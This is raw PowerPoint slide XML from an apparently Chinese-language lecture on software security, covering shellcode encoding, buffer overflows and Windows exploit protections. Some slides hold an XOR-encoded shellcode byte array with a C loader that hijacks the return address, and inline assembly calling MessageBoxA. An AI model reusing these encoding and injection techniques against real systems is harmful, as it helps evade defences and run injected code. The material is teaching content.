              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>hellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>编码</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10651295"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839416" y="1107134"/>
            <a:ext cx="7125669" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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解码程序加上之前编码的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形成最终完整的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320926" y="1564669"/>
            <a:ext cx="5111493" cy="4801314"/>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shellcode[]=</a:t>
            </a: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\xE8\x00\x00\x00\x00\x58\x83\xC0</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\x15\x33\xC9\x8A\x1C\x08\x80\xF3</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\x44\x88\x1C\x08\x41\x80\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xFB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\x90</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\x75\xF1</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\x77\x9F\x17\x2C\x36\x28\x20\x64</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\x2C\x2B\x64\x33\x2B\x2C\x2C\x21</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\x28\x28\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xCF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\x80\x17\x14\x14\x17</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xFC</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xAE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\x43\x01\x3A\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\x94\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xCD</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xFD</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xFD</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xFD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EE0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xFD</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>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main</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argc</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err="1">
                <a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>argv</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LoadLibrary</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A31515"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"user32.dll"</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*ret;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ret=(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*)&amp;ret+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</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(*ret)=(</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)shellcode;</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98658"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{312C81CF-067D-DB8B-8353-79BC535830D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1555059"/>
            <a:ext cx="4604928" cy="4700614"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263836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CD16844-709A-38CB-866D-9607AD7A915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下列不属于对</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Shellcode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进行编码的原因的是</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A701790-857F-B638-49BA-FB5C62565AB7}"/>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字符集差异</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D372A96-F67A-ACC1-D0E6-BBD08A783F3C}"/>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绕过安全检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5F9874-5416-BBB8-D279-2A1A95CA02EB}"/>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绕过坏字符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A4F3F53-3FC9-B0CB-CC62-D01C6CF01162}"/>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绕过返回地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="椭圆 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{486DD25D-A249-22DB-3154-171FBE1D4161}"/>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66F1695E-130E-B91F-7689-F1BA53659A5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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39DA79AA-498C-D7D3-430A-1B4DF9B27C74}"/>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77024E0B-3E51-ACA5-DCD5-6256929E16DB}"/>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F24F5B9C-66ED-1C45-F20A-D091D4E91D5C}"/>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74780736-26DE-2767-9F0E-BB2E40836FEC}"/>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89935076-C173-36E6-73A6-4BABAA57CB2A}"/>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70A981F2-9996-AB56-8C96-85DCF18F4595}"/>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860105C7-E232-1EBE-CDDF-271417F5CF5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1FB5386B-157C-E958-6F52-98BEFFB92182}"/>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339ED839-261C-558B-8A0B-A30C16FC668C}"/>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32847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03</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全防护</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6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4071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软件漏洞带来的威胁</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操作系统层面的防御</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8259"/>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为了能在操作系统层面提供对软件漏洞的防范，</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操作系统自</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Vista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版本开撕，陆续提供了多种防范措施和手段，对于提高</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操作系统抵御漏洞攻击起到了关键作用。</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DCB2067A-5DC1-759E-C799-1864F72C41F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="910369" y="1708259"/>
            <a:ext cx="4824536" cy="1980735"/>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由于</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等高级语言在边界检查方面存在不足，致使缓冲区溢出漏洞等多种软件漏洞已经成为软件安全的主要威胁之一，尤其对于使用广泛的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操作系统及其应用程序造成了极大的危害。</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889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441" y="112533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思路</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384441" y="1616885"/>
            <a:ext cx="4968143" cy="2750176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>需要调用一些系统函数才能实现系统功能达到攻击目的，因为这些函数的地址往往是系统</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DLL</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如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Dll</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可执行文件本身、栈数据或</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Process Environment Block</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进程环境块）中的固定调用地址，所以为</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的调用提供了方便。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="文本框 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78ADE40B-0155-38EE-382D-7EBFB2DFCA05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="1695305"/>
            <a:ext cx="4969198" cy="4524315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>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a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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a:solidFill>
                  <a:srgbClr val="001080"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="795E26"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>LoadLibrary</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"user32.dll"</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_asm{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xor ebx,ebx</a:t>
            </a:r>
          </a:p>
          <a:p>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0x20646C72</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0x6F77206F</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0x6C6C6568</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mov eax, esp</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>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push eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>push eax</a:t>
            </a:r>
          </a:p>
          <a:p>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mov eax, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x7E4507EA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>//MessageBoxA</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call eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="AF00DB"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="098658"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="矩形 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25B99F27-BEA4-E199-27F9-313A1458587E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991544" y="4813484"/>
            <a:ext cx="3038497" cy="360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A2DDE8C9-4791-2C35-2F00-87A23ACB457E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789301" y="1144535"/>
            <a:ext cx="476765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思考：如何防止</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执行？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38056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441" y="1125338"/>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思路</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384441" y="1616885"/>
            <a:ext cx="4968143" cy="4673780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>需要调用一些系统函数才能实现系统功能达到攻击目的，因为这些函数的地址往往是系统</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>DLL</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如</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>kernel32. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Dll</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可执行文件本身、栈数据或</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>PEB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
